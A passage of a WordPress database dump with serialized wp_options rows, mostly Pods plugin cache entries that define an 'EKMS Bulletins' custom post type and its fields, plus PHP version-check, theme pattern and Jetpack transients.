Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}}','off'),(5637338,'_transient_timeout_pods_63030737b916e2bbebd3df8ab5e779c3','1782456450','off'),(5637339,'_transient_pods_63030737b916e2bbebd3df8ab5e779c3','a:28:{s:11:\"object_type\";s:9:\"post_type\";s:4:\"type\";s:9:\"post_type\";s:11:\"object_name\";s:13:\"ekms_bulletin\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:21:\"wp_pods_ekms_bulletin\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:33:\"`t`.`post_type` = \'ekms_bulletin\'\";}s:13:\"where_default\";s:34:\"`t`.`post_status` IN ( \'publish\' )\";s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:69:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:13:\"ekms_bulletin\";s:2:\"id\";i:2483;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:14:\"EKMS Bulletins\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:13:\"EKMS Bulletin\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:14:\"supports_title\";s:1:\"1\";s:15:\"supports_editor\";s:1:\"1\";s:4:\"type\";s:9:\"post_type\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:13:\"ekms_bulletin\";s:18:\"publicly_queryable\";s:1:\"1\";s:19:\"exclude_from_search\";s:1:\"0\";s:15:\"capability_type\";s:4:\"post\";s:22:\"capability_type_custom\";s:13:\"ekms_bulletin\";s:21:\"capability_type_extra\";s:1:\"1\";s:11:\"has_archive\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"0\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:13:\"rewrite_feeds\";s:1:\"0\";s:13:\"rewrite_pages\";s:1:\"1\";s:9:\"query_var\";s:1:\"1\";s:10:\"can_export\";s:1:\"1\";s:14:\"default_status\";s:5:\"draft\";s:15:\"supports_author\";s:1:\"0\";s:18:\"supports_thumbnail\";s:1:\"0\";s:16:\"supports_excerpt\";s:1:\"0\";s:19:\"supports_trackbacks\";s:1:\"0\";s:22:\"supports_custom_fields\";s:1:\"0\";s:17:\"supports_comments\";s:1:\"0\";s:18:\"supports_revisions\";s:1:\"0\";s:24:\"supports_page_attributes\";s:1:\"0\";s:21:\"supports_post_formats\";s:1:\"0\";s:28:\"built_in_taxonomies_category\";s:1:\"0\";s:46:\"built_in_taxonomies_elementor_library_category\";s:1:\"0\";s:42:\"built_in_taxonomies_elementor_library_type\";s:1:\"0\";s:41:\"built_in_taxonomies_institutions_category\";s:1:\"0\";s:33:\"built_in_taxonomies_link_category\";s:1:\"0\";s:28:\"built_in_taxonomies_post_tag\";s:1:\"0\";s:37:\"built_in_taxonomies_resource_category\";s:1:\"0\";s:32:\"built_in_taxonomies_resource_tag\";s:1:\"0\";s:33:\"built_in_taxonomies_resource_type\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:17:\"show_in_admin_bar\";s:1:\"1\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:18:\"pfat_append_single\";s:6:\"append\";s:18:\"pfat_filter_single\";s:11:\"the_content\";s:19:\"pfat_append_archive\";s:6:\"append\";s:19:\"pfat_filter_archive\";s:6:\"custom\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:9:\"menu_icon\";s:19:\"dashicons-pressthis\";s:26:\"supports_jetpack_publicize\";s:1:\"0\";s:25:\"supports_jetpack_markdown\";s:1:\"0\";s:39:\"built_in_taxonomies_elementor_font_type\";s:1:\"0\";s:28:\"built_in_taxonomies_wp_theme\";s:1:\"0\";s:26:\"pfat_filter_archive_custom\";s:11:\"the_content\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:24:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}}}','off'),(5631780,'_site_transient_timeout_php_check_e1575808cef126e0bfb4325cceefee7d','1782306739','off'),(5631781,'_site_transient_php_check_e1575808cef126e0bfb4325cceefee7d','a:5:{s:19:\"recommended_version\";s:3:\"8.3\";s:15:\"minimum_version\";s:3:\"7.4\";s:12:\"is_supported\";b:0;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','off'),(5632176,'_transient_timeout_pods_29ce3e281e6410073879aef53e93bac3','1782317647','off'),(5632177,'_transient_pods_29ce3e281e6410073879aef53e93bac3','a:2:{i:0;i:2393;i:1;i:462;}','off'),(5632178,'_transient_timeout_pods_a1f8fa7494ac8b592bfd85c9f932044e','1782317647','off'),(5632179,'_transient_pods_a1f8fa7494ac8b592bfd85c9f932044e','a:0:{}','off'),(5632189,'_transient_timeout_pods_0c4e3532400dc142ac568bb9f8402c47','1782317712','off'),(5632190,'_transient_pods_0c4e3532400dc142ac568bb9f8402c47','a:0:{}','off'),(5632191,'_transient_timeout_pods_19531785a862e1889807ce74de62534d','1782317712','off'),(5632192,'_transient_pods_19531785a862e1889807ce74de62534d','a:0:{}','off'),(5635598,'_transient_timeout_pods_6ae530f3f630c8c62b54f3da0dda44fd','1782406944','off'),(5635599,'_transient_pods_6ae530f3f630c8c62b54f3da0dda44fd','a:0:{}','off'),(5644784,'_site_transient_timeout_wp_theme_files_patterns-9b3543dc3ceb84e9fbdd7b8f665cb80e','1782112477','off'),(5644785,'_site_transient_wp_theme_files_patterns-9b3543dc3ceb84e9fbdd7b8f665cb80e','a:2:{s:7:\"version\";s:5:\"2.1.2\";s:8:\"patterns\";a:0:{}}','off'),(5644719,'_transient_timeout_jpp_li_cd931f98bc71a32605479cb588db1962','1782110521','off'),(5644646,'_transient_timeout_jpp_li_cf0524d21d07be461a54dd6da856764e','1782109346','off'),(5644647,'_transient_jpp_li_cf0524d21d07be461a54dd6da856764e','a:5:{s:6:\"status\";s:2:\"ok\";s:3:\"msg\";s:54:\"N